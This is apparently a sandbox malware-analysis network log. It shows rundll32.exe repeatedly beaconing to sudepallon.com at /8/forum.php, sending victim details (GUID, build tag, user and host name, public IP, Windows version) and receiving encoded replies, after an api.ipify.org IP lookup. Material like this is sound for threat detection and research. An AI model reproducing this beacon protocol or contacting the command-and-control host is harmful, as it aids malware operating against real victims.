                                        Jul 9, 2021 03:07:54.363779068 CEST331OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:54.432085991 CEST331INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:56 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cNZAMARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        34192.168.2.224919977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:55.321157932 CEST332OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:55.387204885 CEST332INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:56 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZQJAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        35192.168.2.224920077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:55.717690945 CEST333OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:55.785466909 CEST333INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:57 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFFUUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        36192.168.2.224920177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:56.230076075 CEST334OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:56.297401905 CEST335INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:57 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 4a 51 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGJQTARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        37192.168.2.224920277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:56.941934109 CEST335OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:57.010560036 CEST336INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:58 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZNMAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        38192.168.2.224920377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:57.317807913 CEST336OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:57.386893034 CEST337INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:58 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cNNMMARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        39192.168.2.224920477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:57.668711901 CEST338OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:57.736526012 CEST338INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:59 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJHSQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.224916923.21.211.16280C:\Windows\SysWOW64\svchost.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:44.079777956 CEST292OUTGET /?format=xml HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: api.ipify.org
                                        Connection: Keep-Alive
                                        Jul 9, 2021 03:07:44.189335108 CEST293INHTTP/1.1 200 OK
                                        Server: Cowboy
                                        Connection: keep-alive
                                        Content-Type: text/plain
                                        Vary: Origin
                                        Date: Fri, 09 Jul 2021 01:07:44 GMT
                                        Content-Length: 14
                                        Via: 1.1 vegur
                                        Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                                        Data Ascii: 185.189.150.70


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        40192.168.2.224920577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:58.036202908 CEST339OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:58.106026888 CEST339INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:59 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMTGNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        41192.168.2.224920677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:58.377813101 CEST340OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:58.447382927 CEST340INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:00 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGZATARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        42192.168.2.224920777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:58.729573965 CEST341OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:58.796766996 CEST341INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:00 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 43 58 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKCXPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        43192.168.2.224920877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:59.130501032 CEST342OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:59.196698904 CEST342INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:00 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cVZAEARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        44192.168.2.224920977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:59.478945971 CEST343OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:59.546334028 CEST344INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:01 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQZAJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        45192.168.2.224921077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:00.377326012 CEST344OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:00.443205118 CEST345INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:02 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMYBNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        46192.168.2.224921177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:00.726202011 CEST345OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:00.791616917 CEST346INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:02 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJHSQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        47192.168.2.224921277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:01.068500996 CEST347OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:01.134706974 CEST347INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:02 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJTGQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        48192.168.2.224921377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:01.409549952 CEST348OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:01.477013111 CEST348INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:03 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 54 4d 4e 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cTMNGARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        49192.168.2.224921477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:01.751272917 CEST349OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:01.817840099 CEST349INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:03 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCZAXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.224917077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
